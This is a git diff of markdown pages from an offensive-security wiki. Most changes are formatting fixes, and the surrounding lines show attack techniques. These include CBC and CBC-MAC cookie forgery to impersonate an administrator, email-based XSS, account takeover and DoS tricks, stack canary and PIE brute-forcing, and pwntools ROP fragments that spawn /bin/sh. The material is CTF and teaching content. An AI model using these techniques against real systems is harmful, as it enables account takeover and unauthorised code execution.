-**OCSP **(RFC 2560) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without **having to **download **the **entire CRL**.\
-**CRL **is the **traditional method **of checking certificate validity. A** CRL provides a list of certificate serial numbers **that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries.\
-From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206\_3\_1\_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm#:\~:text=OCSP%20\(RFC%202560\)%20is%20a,to%20download%20the%20entire%20CRL.\&text=A%20CRL%20provides%20a%20list,or%20are%20no%20longer%20valid.).
+**OCSP** (RFC 2560) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**.\
+**CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries.\
+From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206\_3\_1\_Web\_Help/Content/ArubaFrameStyles/CertRevocation/About\_OCSP\_and\_CRL.htm#:\~:text=OCSP%20\(RFC%202560\)%20is%20a,to%20download%20the%20entire%20CRL.\&text=A%20CRL%20provides%20a%20list,or%20are%20no%20longer%20valid.).
 
 ### What is Certificate Transparency
 
@@ -127,7 +127,7 @@ openssl x509 -inform der -in certificatename.der -out certificatename.pem
 
 **Convert PEM to P7B**
 
-**Note:** The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c.** **A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key. The most common platforms that support P7B files are Microsoft Windows and Java Tomcat.
+**Note:** The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c. **** A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key. The most common platforms that support P7B files are Microsoft Windows and Java Tomcat.
 
 ```
 openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer
diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/cryptography/cipher-block-chaining-cbc-mac-priv.md
index 726ac667..fe07762b 100644
--- a/cryptography/cipher-block-chaining-cbc-mac-priv.md
+++ b/cryptography/cipher-block-chaining-cbc-mac-priv.md
@@ -2,15 +2,15 @@
 
 ## CBC
 
-If the **cookie **is **only **the **username **(or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce **the **first byte **of the cookie.
+If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie.
 
 ## CBC-MAC
 
-In cryptography, a **cipher block chaining message authentication code** (**CBC-MAC**) is a technique for constructing a message authentication code from a block cipher. The message is encrypted with some block cipher algorithm in CBC mode to create a **chain of blocks such that each block depends on the proper encryption of the previous block**. This interdependence ensures that a **change **to **any **of the plaintext **bits **will cause the **final encrypted block **to **change **in a way that cannot be predicted or counteracted without knowing the key to the block cipher.
+In cryptography, a **cipher block chaining message authentication code** (**CBC-MAC**) is a technique for constructing a message authentication code from a block cipher. The message is encrypted with some block cipher algorithm in CBC mode to create a **chain of blocks such that each block depends on the proper encryption of the previous block**. This interdependence ensures that a **change** to **any** of the plaintext **bits** will cause the **final encrypted block** to **change** in a way that cannot be predicted or counteracted without knowing the key to the block cipher.
 
-To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector and keeps the last block. The following figure sketches the computation of the CBC-MAC of a message comprising blocks![m\_{1}\\|m\_{2}\\|\cdots \\|m\_{x}](https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) using a secret key k and a block cipher E:
+To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector and keeps the last block. The following figure sketches the computation of the CBC-MAC of a message comprising blocks![m\_{1}\\|m\_{2}\\|\cdots \\|m\_{x}](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) using a secret key k and a block cipher E:
 
-![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC_structure_\(en\).svg/570px-CBC-MAC_structure_\(en\).svg.png)
+![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
 
 ## Vulnerability
 
@@ -27,26 +27,26 @@ Then a message composed by m1 and m2 concatenated (m3) will generate 2 signature
 
 **Which is possible to calculate without knowing the key of the encryption.**
 
-Imagine you are encrypting the name **Administrator **in **8bytes **blocks:
+Imagine you are encrypting the name **Administrator** in **8bytes** blocks:
 
 * `Administ`
 * `rator\00\00\00`
 
-You can create a username called **Administ **(m1) and retrieve the key (s1).\
+You can create a username called **Administ** (m1) and retrieve the key (s1).\
 Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)` which is s32.\
 now, knowing s1 and s32 you can put them together an generate the encryption of the full name **Administrator**.
 
 #### Summary
 
-1. Get the signature of username **Administ **(m1) which is s1
-2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0 **is s32**.**
+1. Get the signature of username **Administ** (m1) which is s1
+2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0** is s32**.**
 3. Set the cookie to s1 followed by s32 and it will be a valid cookie for the user **Administrator**.
 
 ## Attack Controlling IV
 
 If you can control the used IV the attack could be very easy.\
 If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\
-Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator. **This cookie will be valid to **impersonate **the user **administrator **with the initial **IV**.
+Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**.
 
 ## References
 
diff --git a/cryptography/hash-length-extension-attack.md b/cryptography/hash-length-extension-attack.md
index d05a2094..af12e297 100644
--- a/cryptography/hash-length-extension-attack.md
+++ b/cryptography/hash-length-extension-attack.md
@@ -4,10 +4,10 @@
 
 Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know:
 
-* **The length of the secret **(this can be also bruteforced from a given length range)
+* **The length of the secret** (this can be also bruteforced from a given length range)
 * **The clear text data**
 * **The algorithm (and it's vulnerable to this attack)**
-* **The padding is known **
+* **The padding is known**&#x20;
   * Usually a default one is used, so if the other 3 requirements are met, this also is
   * The padding vary depending on the length of the secret+data, that's why the length of the secret is needed
 
diff --git a/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md b/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md
index 9c37fe06..5003bac0 100644
--- a/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md
+++ b/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md
@@ -4,7 +4,7 @@
 
 ## Enumeration
 
-I started **enumerating the machine using my tool **[**Legion**](https://github.com/carlospolop/legion):
+I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
 
 ![](<../../.gitbook/assets/image (244).png>)
 
@@ -16,7 +16,7 @@ In the web page you can **register new users**, and I noticed that **the length
 
 ![](<../../.gitbook/assets/image (246).png>)
 
-And if you change some **byte **of the **cookie **you get this error:
+And if you change some **byte** of the **cookie** you get this error:
 
 ![](<../../.gitbook/assets/image (247).png>)
 
diff --git a/ctf-write-ups/try-hack-me/pickle-rick.md b/ctf-write-ups/try-hack-me/pickle-rick.md
index 757c19ac..908c498e 100644
--- a/ctf-write-ups/try-hack-me/pickle-rick.md
+++ b/ctf-write-ups/try-hack-me/pickle-rick.md
@@ -6,7 +6,7 @@ This machine was categorised as easy and it was pretty easy.
 
 ## Enumeration
 
-I started **enumerating the machine using my tool **[**Legion**](https://github.com/carlospolop/legion):
+I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
 
 ![](<../../.gitbook/assets/image (79) (2).png>)
 
@@ -18,13 +18,13 @@ So, I launched legion to enumerate the HTTP service:
 
 Note that in the image you can see that `robots.txt` contains the string `Wubbalubbadubdub`
 
-After some seconds I reviewed what `disearch `has already discovered :
+After some seconds I reviewed what `disearch` has already discovered :
 
 ![](<../../.gitbook/assets/image (235).png>)
 
 ![](<../../.gitbook/assets/image (236).png>)
 
-And as you may see in the last image a **login **page was discovered.
+And as you may see in the last image a **login** page was discovered.
 
 Checking the source code of the root page, a username is discovered: `R1ckRul3s`
 
diff --git a/emails-vulns.md b/emails-vulns.md
index 99f2112e..bc6d1ead 100644
--- a/emails-vulns.md
+++ b/emails-vulns.md
@@ -4,11 +4,11 @@
 
 ### Ignored parts of an email
 
-The symbols: **+, -** and **{} **in rare occasions can be used for tagging and ignored by most e-mail servers
+The symbols: **+, -** and **{}** in rare occasions can be used for tagging and ignored by most e-mail servers
 
 * E.g. john.doe+intigriti@example.com → john.doe@example.com
 
-**Comments between parentheses () **at the beginning or the end will also be ignored 
+**Comments between parentheses ()** at the beginning or the end will also be ignored&#x20;
 
 * E.g. john.doe(intigriti)@example.com → john.doe@example.com
 
@@ -33,16 +33,16 @@ You can also use IPs as domain named between square brackets:
 
 ### XSS
 
-Some services like **github **or **salesforce allows **you to create an **email address with XSS payloads on it**. If you can **use this providers to login on other services** and this services** aren't sanitising** correctly the email, you could cause **XSS**.
+Some services like **github** or **salesforce allows** you to create an **email address with XSS payloads on it**. If you can **use this providers to login on other services** and this services **aren't sanitising** correctly the email, you could cause **XSS**.
 
 ### Account-Takeover
 
-If a **SSO service** allows you to **create an account without verifying the given email address** (like **salesforce**) and then you can use that account to **login in a different service** that **trusts **salesforce, you could access any account.\
+If a **SSO service** allows you to **create an account without verifying the given email address** (like **salesforce**) and then you can use that account to **login in a different service** that **trusts** salesforce, you could access any account.\
 _Note that salesforce indicates if the given email was or not verified but so the application should take into account this info._
 
 ## Reply-To
 
-You can send an email using _**From: company.com**_** **and _**Replay-To: attacker.com **_and if any **automatic reply **is sent due to the email was sent **from **an **internal address **the **attacker **may be able to **receive **that **response**.
+You can send an email using _**From: company.com**_** ** and _**Replay-To: attacker.com**_ and if any **automatic reply** is sent due to the email was sent **from** an **internal address** the **attacker** may be able to **receive** that **response**.
 
 ## **References**
 
@@ -52,6 +52,6 @@ You can send an email using _**From: company.com**_** **and _**Replay-To: attack
 
 Some applications like AWS have a **Hard Bounce Rate** (in AWS is 10%), that whenever is overloaded the email service is blocked.
 
-A **hard bounce** is an **email** that couldn’t be delivered for some permanent reasons. Maybe the **email’s** a fake address, maybe the **email** domain isn’t a real domain, or maybe the **email** recipient’s server won’t accept **emails**) , that means from total of 1000 emails if 100 of them were fake or were invalid that caused all of them to bounce, **AWS SES **will block your service.
+A **hard bounce** is an **email** that couldn’t be delivered for some permanent reasons. Maybe the **email’s** a fake address, maybe the **email** domain isn’t a real domain, or maybe the **email** recipient’s server won’t accept **emails**) , that means from total of 1000 emails if 100 of them were fake or were invalid that caused all of them to bounce, **AWS SES** will block your service.
 
 So, if you are able to **send mails (maybe invitations) from the web application to any email address, you could provoke this block by sending hundreds of invitations to nonexistent users and domains: Email service DoS.**
diff --git a/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md b/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md
index 489c4baa..8220f739 100644
--- a/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md
+++ b/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md
@@ -13,7 +13,7 @@ However, you can manually notice this if you find that a value is saved in the s
 
 The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it (network service), because every time you connect to it **the same canary will be used**.
 
-Then, the best way to bypass the canary is just to** brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function **brute-forces an 8 Bytes canary (x64) **and distinguish between a correct guessed byte and a bad byte just **checking **if a **response **is sent back by the server (another way in **other situation **could be using a **try/except**):
+Then, the best way to bypass the canary is just to **brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function **brute-forces an 8 Bytes canary (x64)** and distinguish between a correct guessed byte and a bad byte just **checking** if a **response** is sent back by the server (another way in **other situation** could be using a **try/except**):
 
 ### Example 1
 
@@ -61,7 +61,7 @@ CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
 ### Example 2
 
 This is implemented for 32 bits, but this could be easily changed to 64bits.\
-Also note that for this example the** program expected first a byte to indicate the size of the input **and the payload.
+Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload.
 
 ```python
 from pwn import *
@@ -107,17 +107,17 @@ log.info(f"The canary is: {canary}")
 ## Print Canary
 
 Another way to bypass the canary is to **print it**.\
-Imagine a situation where a **program vulnerable **to stack overflow can execute a **puts** function **pointing **to **part **of the **stack overflow**. The attacker knows that the** first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random **bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.\
-Then, the attacker** calls the puts functionalit**y on the middle of the payload which will **print all the canary** (except from the first null byte).\
+Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.\
+Then, the attacker **calls the puts functionalit**y on the middle of the payload which will **print all the canary** (except from the first null byte).\
 With this info the attacker can **craft and send a new attack** knowing the canary (in the same program session)
 
-Obviously, this tactic is very **restricted **as the attacker needs to be able to **print **the **content **of his **payload **to **exfiltrate **the **canary **and then be able to create a new payload (in the **same program session**) and **send **the **real buffer overflow**.\
-CTF example: [https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17\_svc/index.html)
+Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.\
+CTF example: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html)
 
 ## PIE
 
 In order to bypass the PIE you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\
-For example, if a binary is protected using both a **canary **and **PIE**, you can start brute-forcing the canary, then the **next **8 Bytes (x64) will be the saved **RBP **and the **next **8 Bytes will be the saved **RIP.**
+For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.**
 
 To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP:
 
@@ -132,20 +132,20 @@ RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])
 
 ### Get base address
 
-The last thing you need to defeat the PIE is to calculate** useful addresses from the leaked** addresses: the **RBP **and the **RIP**.
+The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**.
 
-From the **RBP **you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00" _inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP **an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP:
+From the **RBP** you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00"_ inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP** an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP:
 
 ```python
 INI_SHELLCODE = RBP - 1152
 ```
 
-From the **RIP **you can calculate the** base address of the PIE binary **which is what you are going to need to create a **valid ROP chain**.\
+From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.\
 To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses:
 
 ![](<../../.gitbook/assets/image (145).png>)
 
-In that example you can see that only **1 Byte and a half is needed **to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked _0x562002970**ecf** _the base address is _0x562002970**000**_
+In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked _0x562002970**ecf** _ the base address is _0x562002970**000**_
 
 ```python
 elf.address = RIP - (RIP & 0xfff)
diff --git a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md
index edf7c036..7f4a85c3 100644
--- a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md
+++ b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md
@@ -2,8 +2,8 @@
 
 ## Quick Resume
 
-1. **Find **overflow **offset**
-2. **Find **`POP_RDI`, `PUTS_PLT` and `MAIN_PLT` gadgets
+1. **Find** overflow **offset**
+2. **Find** `POP_RDI`, `PUTS_PLT` and `MAIN_PLT` gadgets
 3. Use previous gadgets lo **leak the memory address** of puts or another libc function and **find the libc version** ([donwload it](https://libc.blukat.me))
 4. With the library, **calculate the ROP and exploit it**
 
@@ -60,7 +60,7 @@ if OFFSET == "":
     return
 ```
 
-**Execute **`python template.py` a GDB console will be opened with the program being crashed. Inside that **GDB console **execute `x/wx $rsp` to get the **bytes **that were going to overwrite the RIP. Finally get the **offset **using a **python **console:
+**Execute** `python template.py` a GDB console will be opened with the program being crashed. Inside that **GDB console** execute `x/wx $rsp` to get the **bytes** that were going to overwrite the RIP. Finally get the **offset** using a **python** console:
 
 ```python
 from pwn import *
@@ -76,7 +76,7 @@ Another way would be to use: `pattern create 1000` -- _execute until ret_ -- `pa
 
 ## 2- Finding Gadgets
 
-Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc **being used, and later to **launch the final exploit**.
+Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc** being used, and later to **launch the final exploit**.
 
 ```python
 PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
@@ -89,15 +89,15 @@ log.info("Puts plt: " + hex(PUTS_PLT))
 log.info("pop rdi; ret  gadget: " + hex(POP_RDI))
 ```
 
-The `PUTS_PLT `is needed to call the **function puts**.\
-The `MAIN_PLT` is needed to call the **main function **again after one interaction to **exploit **the overflow **again **(infinite rounds of exploitation). **It is used at the end of each ROP to call the program again**.\
-The **POP\_RDI **is needed to **pass** a **parameter **to the called function.
+The `PUTS_PLT` is needed to call the **function puts**.\
+The `MAIN_PLT` is needed to call the **main function** again after one interaction to **exploit** the overflow **again** (infinite rounds of exploitation). **It is used at the end of each ROP to call the program again**.\
+The **POP\_RDI** is needed to **pass** a **parameter** to the called function.
 
 In this step you don't need to execute anything as everything will be found by pwntools during the execution.
 
 ## 3- Finding LIBC library
 
-Now is time to find which version of the **libc **library is being used. To do so we are going to **leak **the **address **in memory of the **function **`puts`and then we are going to **search **in which **library version **the puts version is in that address.
+Now is time to find which version of the **libc** library is being used. To do so we are going to **leak** the **address** in memory of the **function** `puts`and then we are going to **search** in which **library version** the puts version is in that address.
 
 ```python
 def get_addr(func_name):
@@ -134,16 +134,16 @@ To do so, the most important line of the executed code is:
 rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
 ```
 
-This will send some bytes util **overwriting **the **RIP **is possible: `OFFSET`.\
-Then, it will set the **address **of the gadget `POP_RDI `so the next address (`FUNC_GOT`) will be saved in the **RDI **registry. This is because we want to **call puts** **passing **it the **address **of the `PUTS_GOT`as the address in memory of puts function is saved in the address pointing by `PUTS_GOT`.\
-After that, `PUTS_PLT `will be called (with `PUTS_GOT `inside the **RDI**) so puts will **read the content** inside `PUTS_GOT `(**the address of puts function in memory**) and will **print it out**.\
+This will send some bytes util **overwriting** the **RIP** is possible: `OFFSET`.\
+Then, it will set the **address** of the gadget `POP_RDI` so the next address (`FUNC_GOT`) will be saved in the **RDI** registry. This is because we want to **call puts** **passing** it the **address** of the `PUTS_GOT`as the address in memory of puts function is saved in the address pointing by `PUTS_GOT`.\
+After that, `PUTS_PLT` will be called (with `PUTS_GOT` inside the **RDI**) so puts will **read the content** inside `PUTS_GOT` (**the address of puts function in memory**) and will **print it out**.\
 Finally, **main function is called again** so we can exploit the overflow again.
 
-This way we have **tricked puts function** to **print **out the **address **in **memory **of the function **puts **(which is inside **libc **library). Now that we have that address we can **search which libc version is being used**.
+This way we have **tricked puts function** to **print** out the **address** in **memory** of the function **puts** (which is inside **libc** library). Now that we have that address we can **search which libc version is being used**.
 
 ![](<../../../.gitbook/assets/image (141).png>)
 
-As we are **exploiting **some **local **binary it is **not needed **to figure out which version of **libc **is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\
+As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\
 But, in a remote exploit case I will explain here how can you find it:
 
 ### 3.1- Searching for libc version (1)
@@ -167,7 +167,7 @@ For this to work we need:
 * Libc symbol name: `puts`
 * Leaked libc adddress: `0x7ff629878690`
 
-We can figure out which **libc **that is most likely used.
+We can figure out which **libc** that is most likely used.
 
 ```
 ./find puts 0x7ff629878690
@@ -202,9 +202,9 @@ gets
 
 At this point we should know the libc library used. As we are exploiting a local binary I will use just:`/lib/x86_64-linux-gnu/libc.so.6`
 
-So, at the begging of `template.py` change the **libc **variable to: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it`
+So, at the begging of `template.py` change the **libc** variable to: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it`
 
-Giving the **path **to the **libc library **the rest of the **exploit is going to be automatically calculated**.&#x20;
+Giving the **path** to the **libc library** the rest of the **exploit is going to be automatically calculated**.&#x20;
 
 Inside the `get_addr`function the **base address of libc** is going to be calculated:
 
@@ -218,7 +218,7 @@ if libc != "":
 Note that **final libc base address must end in 00**. If that's not your case you might have leaked an incorrect library.
 {% endhint %}
 
-Then, the address to the function `system `and the **address **to the string_ "/bin/sh"_ are going to be **calculated **from the **base address** of **libc **and given the **libc library.**
+Then, the address to the function `system` and the **address** to the string _"/bin/sh"_ are going to be **calculated** from the **base address** of **libc** and given the **libc library.**
 
 ```python
 BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh
@@ -242,17 +242,17 @@ p.interactive() #Interact with the conenction
 ```
 
 Let's explain this final ROP.\
-The last ROP (`rop1`) ended calling again the main function, then we can **exploit again **the **overflow **(that's why the `OFFSET `is here again). Then, we want to call `POP_RDI `pointing to the **addres **of _"/bin/sh"_ (`BINSH`) and call **system **function (`SYSTEM`) because the address of _"/bin/sh"_ will be passed as a parameter.\
-Finally, the **address of exit function** is **called **so the process** exists nicely** and any alert is generated.
+The last ROP (`rop1`) ended calling again the main function, then we can **exploit again** the **overflow** (that's why the `OFFSET` is here again). Then, we want to call `POP_RDI` pointing to the **addres** of _"/bin/sh"_ (`BINSH`) and call **system** function (`SYSTEM`) because the address of _"/bin/sh"_ will be passed as a parameter.\
+Finally, the **address of exit function** is **called** so the process **exists nicely** and any alert is generated.
 
-**This way the exploit will execute a **_**/bin/sh **_**shell.**
+**This way the exploit will execute a **_**/bin/sh**_** shell.**
 
 ![](<../../../.gitbook/assets/image (143).png>)
 
 ## 4(2)- Using ONE\_GADGET
 
-You could also use [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget)to obtain a shell instead of using **system **and **"/bin/sh". ONE\_GADGET **will find inside the libc library some way to obtain a shell using just one **ROP address**. \
-However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP **you just have to send some more NULL values so the constrain is avoided.
+You could also use [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**. \
+However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
 
 ![](<../../../.gitbook/assets/image (615).png>)
 
@@ -293,7 +293,7 @@ If the binary is not using Puts you should check if it is using
 
 ### `sh: 1: %s%s%s%s%s%s%s%s: not found`
 
-If you find this **error **after creating **all **the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
+If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
 
 Try to **subtract 64 bytes to the address of "/bin/sh"**:
 
diff --git a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md
index 70aa78f0..8e182429 100644
--- a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md
+++ b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md
@@ -210,7 +210,7 @@ If the binary is not using Puts you should check if it is using
 
 ### `sh: 1: %s%s%s%s%s%s%s%s: not found`
 
-If you find this **error **after creating **all **the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
+If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
 
 Try to **subtract 64 bytes to the address of "/bin/sh"**:
 
diff --git a/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md b/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md
index d8d86ac0..ff6c86aa 100644
--- a/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md
+++ b/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md
@@ -1,4 +1,4 @@
-# ROP - call sys_execve
+# ROP - call sys\_execve
 
 In order to prepare the call for the **syscall** it's needed the following configuration:
 
@@ -11,7 +11,7 @@ So, basically it's needed to write the string `/bin/sh` somewhere and then perfo
 
 ## Control the registers
 
-Let's start by finding** how to control those registers**:
+Let's start by finding **how to control those registers**:
 
 ```c
 ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
@@ -21,7 +21,7 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
 0x00000000004498b5 : pop rdx ; ret
 ```
 
-With these addresses it's possible to** write the content in the stack and load it into the registers**.
+With these addresses it's possible to **write the content in the stack and load it into the registers**.
 
 ## Write string
 
@@ -160,4 +160,4 @@ target.interactive()
 
 ## References
 
-* [https://guyinatuxedo.github.io/07-bof_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19\_speedrun1/index.html)
+* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html)
diff --git a/exploiting/tools/README.md b/exploiting/tools/README.md
index 6db213a3..b1bc7e4f 100644
--- a/exploiting/tools/README.md
+++ b/exploiting/tools/README.md
@@ -61,9 +61,9 @@ apt-get install gdb
 
 \> **print variable**\
 \> **print 0x87654321 - 0x12345678** --> Caculate\
-\> **examine o/x/u/t/i/s dir_mem/reg/puntero** --> Shows content in octal/hexa/10/bin/instruction/ascii
+\> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> Shows content in octal/hexa/10/bin/instruction/ascii
 
-* **x/o 0xDir_hex**
+* **x/o 0xDir\_hex**
 * **x/2x $eip** --> 2Words from EIP
 * **x/2x $eip -4** -->  $eip - 4
 * **x/8xb $eip** --> 8  bytes (b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes)
@@ -109,18 +109,18 @@ gef➤  pattern search 0x6261617762616176
 
 #### GDB same addresses
 
-While debugging GDB will have **slightly different addresses than the used by the binary when executed. **You can make GDB have the same addresses by doing:
+While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
 
 * `unset env LINES`
 * `unset env COLUMNS`
 * `set env _=<path>` _Put the absolute path to the binary_
 * Exploit the binary using the same absolute route
-*  `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
+* &#x20;`PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
 
 #### Backtrace to find functions called
 
-When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). In this case it will be difficult to** identify the flow that the binary follows to for example ask for user input**.\
-You can easily identify this flow by **running **the binary with **gdb **until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called:
+When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.\
+You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called:
 
 ```
 gef➤  bt
@@ -139,7 +139,7 @@ gef➤  bt
 
 ### Find stack offset
 
-**Ghidra **is very useful to find the the **offset **for a **buffer overflow thanks to the information about the position of the local variables.**\
